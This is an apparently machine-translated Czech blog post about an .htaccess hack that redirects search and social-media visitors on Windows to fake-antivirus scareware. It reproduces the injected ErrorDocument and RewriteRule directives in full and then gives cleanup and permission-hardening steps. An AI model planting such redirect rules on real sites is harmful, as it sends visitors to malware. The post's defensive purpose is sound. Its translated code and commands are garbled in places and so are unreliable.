Nová forma viru o tom, o čem vidím, že není známo, že není známo, ovlivňuje hostované stránky nebezpečné servery kde mohou účty účtů uživatele / subdomenů “vidět” mezi nimi. Konkrétně jsou hostitelské účty uvedeny do složky “Vhosts“a právo psaní Složka uživatele Z “Vhosts” je dáno na obecném uživateli… resetování ve většině situací. Je to typická webová metoda serverů, které nepoužívají Whm/cpanel.
obsah
Akce viru .htaccess – .htaccess hack
virus ovlivňuje soubory .htaccess místa oběti. Jsou přidané řádky / směrnice což bude Přesměrovat návštěvníky (Pocházejte z Yahoo, MSN, Google, Facebook, Yaindex, Twitter, MySpace atd. Weby a portály s vysokým provozem) na některé weby, které nabízejí “Antivirové roztoky“. Jde o Falešné antivirové řešení, které jsem napsal v zavedení Falešný odstraňovač antiviru.
Tady je, jak a .htaccess ovlivněn: (Nepřistupujte k URL z obsahu níže uvedených řádků)
Errordocument 500 hxxp: //wwww.peoriavascularsurgery.com/main.php? I = j8iiidsar/qmirj7v8noyjoxpa ==&E = 0
Errordocument 502 hxxp: //wwww.peoriavascularsurgery.com/main.php? I = j8iiidsar/qmirj7v8noyjoxpa ==&E = 2
Errordocument 403 hxxp: //wwww.peoriavascularsurgery.com/main.php? I = j8iiidsar/qmirj7v8noyjoxpa ==&E = 3RepriteEngine on
RewriteCond %{http_referer}.*Yandex.*$ [Nc, nebo]
RewriteCond %{http_referer}.*ODNOKLASSNIKI.*$ [NC, OR]
RewriteCond %{http_referer}.*VKontaKte.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Rambler.*$ [Nc, nebo]
RewriteCond %{http_referer}.*TUBE.*$ [Nc, nebo]
rewriteCond %{http_referer}.*wikipedia.*$ [nc, nebo]
RewriteCond %{http_referer}.*Blogger.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Baidu.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Qq.com.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Myspace.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Twitter.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Facebook.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Google.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Live.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Aol.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Bing.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Msn.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Amazon.*$ [Nc, nebo]
RewriteCond %{http_referer}.*EBay.*$ [Nc, nebo]
RewriteCond %{http_referer}.*LinkedIn.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Flickr.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Livejasmin.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Soso.*$ [Nc, nebo]
RewriteCond %{http_referer}.*DoubleClick.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Pornhub.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Orkut.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Livejournal.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Wordpress.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Yahoo.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Zeptejte se.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Excite.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Altavista.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Msn.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Netscape.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Hotbot.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Goto.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Infoseek.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Mamma.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Alltheweb.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Lycos.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Search.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Metacrawler.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Mail.*$ [Nc, nebo]
RewriteCond %{http_referer}.*Dogpile.*$ [Nc]RewriteCond %{http_user_agent}.*Windows.*
Rewriterule.* HXXP: //WWWW.PEORIAVascularSurgery.com/main.php? H =%{http_host}&I = J8iiidsar/QMIRJ7V8NOYJOXPA ==&e = r [r, l]RewriteCond %{request_fileName}! -F
RewriteCond %{request_fileName}! -D
RewriteCond %{request_filename}!.*Jpg $ |.*Gif $ |.*Png $
RewriteCond %{http_user_agent}.*Windows.*
Rewriterule.* HXXP: //WWWW.PEORIAVascularSurgery.com/main.php? H =%{http_host}&I = J8iiidsar/QMIRJ7V8NOYJOXPA ==&E = 4 [r, l]
Ti, kteří používají WordPress, najdou tyto řádky v souboru .htaccess Z public_html. Kromě toho virus vytváří ve složce stejný .htaccess WP-Content.
*Existují také situace, kdy se namísto PeoriavascularSurgery.com objeví DNS.TheSOULFOODCAFE.com nebo jiné adresy.
Co tento virus dělá.
Po přesměrování je návštěvník přivítán s otevřenými zbraněmi:
Varování!
Váš počítač obsahuje různé známky přítomnosti virů a malware. Váš systém vyžaduje okamžitou kontrolu anti virů!
Zabezpečení systému provede rychlé a bezplatné skenování počítače pro viry a škodlivé programy.
Bez ohledu na to, jaké tlačítko stiskneme, jsme převezeni na stránku “Můj počítač“, vytvořeno k napodobování Design XP. Zde to začíná automaticky “Proces skenování”, na konci toho zjistíme “Jsme nakaženi”.
Poté, co stiskneme OK nebo zrušíme, začne to Stáhnoutdo souboru Setup.exe. Tento Setup.exe je falešný anti virus které ovlivňují systém. Nainstalují řadu malwarových aplikací, které dále šíří viry, a kromě a software anti-virus (všechny nepravdivé), že oběť je vyzvána k nákupu.
Ti, kteří již kontaktovali tuto formu viru, mohou použít Falešný odstraňovač antiviru. Doporučuje se také celé skenování HDD. doporučit Kaspersky Internet Security nebo Kaspersky Anti Virus.
Tato forma viru ovlivňuje operační systémy návštěvníků s operačními systémy Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 a Windows 95. Zatím nejsou známy žádné případy infekce operačních systémů Windows Vista a Windows 7.
Jak můžeme tento virus .htaccess ze serveru a jak můžeme zabránit infekci.
1. Analýza souborů a vymazání podezřelých kódů. Aby se zajistilo, že soubor nebude ovlivněn pouze .htaccess Je to dobré Analyzujeme všechny soubory .php a .js.
2. Přepisujeme soubor .htaccess a nastavíme je Chmod 644 nebo 744 s právy psaní pouze s psaním Uživatel-Ul majitel.
3. Při vytváření hostingového účtu pro web ve složce /domov nebo /Webroot Bude automaticky vytvořena složka, která má nejčastěji název uživatele (Uživatel pro CPanel, FTPa atd.). Aby se zabránilo psaní dat a přenosu virů z jednoho uživatele na druhý, je uvedeno, že každá uživatelská složka bude nastavena:
Chmod 644 SAU 744, 755 – uvedené je 644.
CHOWN -R NUME_USER NUME_FOLDER.
chgrp -r nume_user nume_folder
ls -all Chcete -li zkontrolovat, zda byly režimy správně umístěny. Něco se musí objevit v tomto druhu:
Drwx–x–x 12 Dinamics Dinamics 4096 6. května 14:51 Dinamics/
Drwx–x–x 10 Duran Duran 4096 7. března 07:46 Duran/
Drwx–x–Trubky x 12 trubek 4096 ledna 29. ledna 11:23 Trubky/
drwxr-xr-x 14 Express Express 4096 26. února 2009 Express/
Drwxr-x 9 těch 4096 19. května 01:09 Ty /
Drwx–x–X 9 Farm Farm 4096 prosince 19. 22:29 Farma/
Pokud bude mít jeden z výše uvedených uživatelů na FTP virové soubory, nebude schopen poslat virus jinému uživateli hostatu. Jedná se o minimální bezpečnostní opatření pro ochranu účtů hostate na webovém serveru.
Běžné prvky oblastí postižených tímto typem viru.
Všechny postižené oblasti přesměrují návštěvníky na weby, které obsahují doménové jméno “/main.php? E = 4&h“.
Tento “Virus de .htaccess” ovlivnit jakýkoli typ CMS (Joomla, WordPress, PHPBBa atd.) To používá .htaccess.
.htaccess virus hack & Přesměrovat.
